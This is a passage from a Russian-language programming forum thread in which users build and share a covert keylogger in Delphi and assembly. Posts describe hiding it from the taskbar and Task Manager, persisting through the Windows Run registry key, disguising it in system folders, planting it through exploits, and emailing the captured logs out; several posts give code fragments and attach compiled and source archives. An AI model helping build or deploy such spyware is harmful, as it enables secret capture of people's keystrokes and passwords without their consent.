Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > Низкоуровневое программирование > Win Api
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 05.10.2009, 02:47   #51
Lime
Форумчанин
 
Аватар для Lime
 
Регистрация: 10.02.2009
Сообщений: 815
По умолчанию

Цитата:
Сообщение от DeKot Посмотреть сообщение
Это уже чисто хакерские требования.Лично я не ставлю перед собой задачи скрытности (пока не требуется). Вся разработка чисто для практических навыков (читай самообучние).
Если дальше развивать тему (в хакерском понимании) - то нужно добавить 1. невидимость хотя бы в панели задач (в идеале и в Диспетчере); 2. автозапуск; 3. "невидимое внедрение" в комп.; 4. доступность к логам.
Это просто перечисление логического порядка создания проги-шпиона, а не желание или требование.
Меня как наверное и многих других заинтересовала книжка фленова впервые попав ко мне в руки

А больше поразило то что ничего не зная и откомпиля 3-4 строчки код можно сделать юзеру довольно неприятно ))
Начал развивать тему , оказалось некоторые простейшие шалости которые могут убить работоспособность например офисного компьютера в 0 при этом ни 1 антивирус не заподозрит подозрительных действий) - меня это вообще поразило ... ну да ладно это оффтоп)

А вообще кейлоггер не должен валятся рядом с пуском - он на то и "клавиатурный шпион" , ну а шпион - выше привелось примерный список для таково определения)
А скрыть форму , автозапуск это всё можно найти в том же фленове да и где только нельзя это найти
Невидимое внедрение - в при нципе тоже организовать не труноо , погуглить хорошенько на тему эксплойтов , и смело юзать , рнадеясь что у юзеров не будет антивируса / фаервола и обновлений безопастности.

Пямо таки строй ботнет - нехочу
Lime вне форума Ответить с цитированием
Старый 05.10.2009, 09:47   #52
DeKot
Участник клуба
 
Аватар для DeKot
 
Регистрация: 12.08.2008
Сообщений: 1,977
По умолчанию

Для betirsolt
Объявляем глобально Lang: boolean;. В обработчике таймера определяется текущая раскладка клавиатуры
Код:
procedure TForm1.Timer1Timer(Sender: TObject); // автоматич. определение раскладки клавиатуры
begin
  if GetKeyboardLayout(GetWindowThreadProcessId(GetForegroundWindow, nil)) = 67699721 then
  lang:= true  //английская
  else
  lang:= false; // русская
end;
Часть кода основной функции
Код:
else
      begin
        if lang = false then // русская раскладка
        begin
          if ord(c[0]) in [65..90] then // диапазон клавиш с англ. символами
          begin
            for i:= 65 to 90 do
            begin
              if ord(c[0]) = i then begin j:= i - 65; BREAK; end;
            end;
            Memo1.lines.Text:= Memo1.lines.Text  + rus[j] // замена англ. симв. на русские
          end
          else Memo1.lines.Text:= Memo1.lines.Text + c; // рус.символы 'ъ,х,э,ж,ю,б,ё'
        end
        else Memo1.lines.Text:= Memo1.lines.Text + c;  // латин.символы при англ. раскладке
      end;
//  далее запись в файл
И не сомневайся даже ... отдых - кайф, работа - лажа!
DeKot вне форума Ответить с цитированием
Старый 06.10.2009, 11:32   #53
betirsolt
Форумчанин
 
Регистрация: 20.07.2009
Сообщений: 421
По умолчанию

все работает отлично...эта тема будет хорошим примером...всем спасибо
Уважаемые модераторы, Я всячески стараюсь не нарушать правила сайта, будьте снисходительны
betirsolt вне форума Ответить с цитированием
Старый 06.10.2009, 13:21   #54
DeKot
Участник клуба
 
Аватар для DeKot
 
Регистрация: 12.08.2008
Сообщений: 1,977
По умолчанию

Есть еще один нюанс - даже при включенной английской раскладке, нажатие клавиш ё,ъ,х,э,ж,ю,б - пишется в лог соответствующими русскими символами.
Для устранения - в ветви программы , где обрабатывается английская раскладка включить дополнительную проверку через оператор case.
Например
Код:
case ord(c[0]) of
          225: c[0]:= ',';
          230: c[0]:= ';';
          253: c[0]:= '"';
          254: c[0]:= '.';
          end;
Можно и другие еще клавиши оптимизировать.
Довел прогу до стадии, когда после запуска она не видна ни в трее, ни в Приложениях Диспетчера ( можно увидеть только в Процессах Диспетчера.Но если прогу при установке запрятать куда то в системные папки, то из-за неприметного имени даже опытному юзеру трудно распознать ее среди нескольких запущенных системных процессов.
При первом запуске - автоматом прописывается в реестре и уже при последующих вкл. компа запускается и постоянно работает.
Лог - C:\WINDOWS\'sws<дата>.sds' Если кто не боится - попробуйте запустить. Потом после запуска завершите процесс в Диспетчере и уберите из реестра -
HKEY_CURRENT_USER\SOFTWARE\Microsof t\Windows\CurrentVersion\Run
Такой вопрос - данного типа программы можно считать вредоносными ( вирусоподобными)?
Вложения
Тип файла: rar keylogV1_0.rar (159.2 Кб, 194 просмотров)
И не сомневайся даже ... отдых - кайф, работа - лажа!
DeKot вне форума Ответить с цитированием
Старый 25.01.2010, 15:36   #55
like_cloud
Пользователь
 
Аватар для like_cloud
 
Регистрация: 09.12.2009
Сообщений: 29
По умолчанию

Код:
case ord(c[0]) of
          <код клавиши>: c[0]:= '<символ>';
          <код клавиши>: c[0]:= '<символ>';
          end;
не поулчается выполнить вот это. Подскажите в чем может быть ошибка?

и еще вопрос: как отследить что клавиша шифт зажата? чтобы потом передать это в функцию,кот отслеживает клавиши и соот-но менять регистр вводимиого в лог.
like_cloud вне форума Ответить с цитированием
Старый 22.02.2011, 12:09   #56
Delphi_ID
Новичок
Джуниор
 
Регистрация: 22.02.2011
Сообщений: 2
По умолчанию

Цитата:
Сообщение от DeKot Посмотреть сообщение
Такой вопрос - данного типа программы можно считать вредоносными ( вирусоподобными)?
По логике вещей если антивирус не найдет, значит нет

DeKot, а можно исходник вашей программы? (06.10.2009, не смотря на древность поста) Хотелось бы от себя добавить отправку лога на почту через idsmtp )
Delphi_ID вне форума Ответить с цитированием
Старый 18.06.2011, 00:26   #57
New man
Форумчанин
 
Регистрация: 24.01.2011
Сообщений: 774
По умолчанию

Цитата:
ункция GetKeyboardLayout извлекает данные об активной раскладке символов на клавиатуре для заданного потока. Если параметр dwLayout нулевой, возвращается значение раскладки для активного потока.

Синтаксис

HKL GetKeyboardLayout
(
DWORD dwLayout // идентификатор потока
);
Параметры
dwLayout
Идентифицирует поток, который делает запрос или является нулем для текущего потока.

Возвращаемые значения
Величина возвращаемого значения - дескриптор раскладки символов на клавиатуре для потока. Младшее слово содержит идентификатор региона, идентифицирующий язык ввода, а старшее слово содержит дескриптор устройства, идентифицирующий физическую раскладку клавиатуры.
можно ли при помощи этой функции раскладку клавиатуры и , если да то как?
a.k.a. Angelicos Phosphoros
Мой сайт
New man вне форума Ответить с цитированием
Старый 18.06.2011, 06:32   #58
Пепел Феникса
Старожил
 
Аватар для Пепел Феникса
 
Регистрация: 28.01.2009
Сообщений: 21,000
По умолчанию

можно что?
Хорошо поставленный вопрос это уже половина ответа. | Каков вопрос, таков ответ.
Программа делает то что написал программист, а не то что он хотел.
Функции/утилиты ждут в параметрах то что им надо, а не то что вы хотите.
Пепел Феникса вне форума Ответить с цитированием
Старый 13.07.2011, 11:12   #59
Spownc
 
Регистрация: 24.09.2009
Сообщений: 4
По умолчанию

"В целях повышения образованности"...
Дайте плиз полный исходник...
А то так понять не могу что и куда писать.

Спасибо!
Spownc вне форума Ответить с цитированием
Старый 04.08.2011, 10:40   #60
DinoAsm
Пользователь
 
Аватар для DinoAsm
 
Регистрация: 29.10.2010
Сообщений: 31
По умолчанию

Вот исходники keyloggera. Полностью на асме. Обратите внимание на параметры в bat-нике.
Прошу не выкладывать откомпилированый вариант.
Вложения
Тип файла: rar keylogger.rar (1.6 Кб, 81 просмотров)
В гостях - хорошо. Дома – лучше. В пути туда и обратно - терпимо. Стоять в проходе и по пол часа прощаться – ужасно.
DinoAsm вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
:::Keylogger::: doniyor Общие вопросы Delphi 15 02.03.2012 19:56
keylogger DeDoK Общие вопросы Delphi 15 06.06.2010 00:15
Keylogger, проблемы andreibtzt Win Api 9 05.06.2010 17:51
обновление в блоге - Клавиатурный шпион. Pblog Обсуждение статей 0 27.05.2007 03:17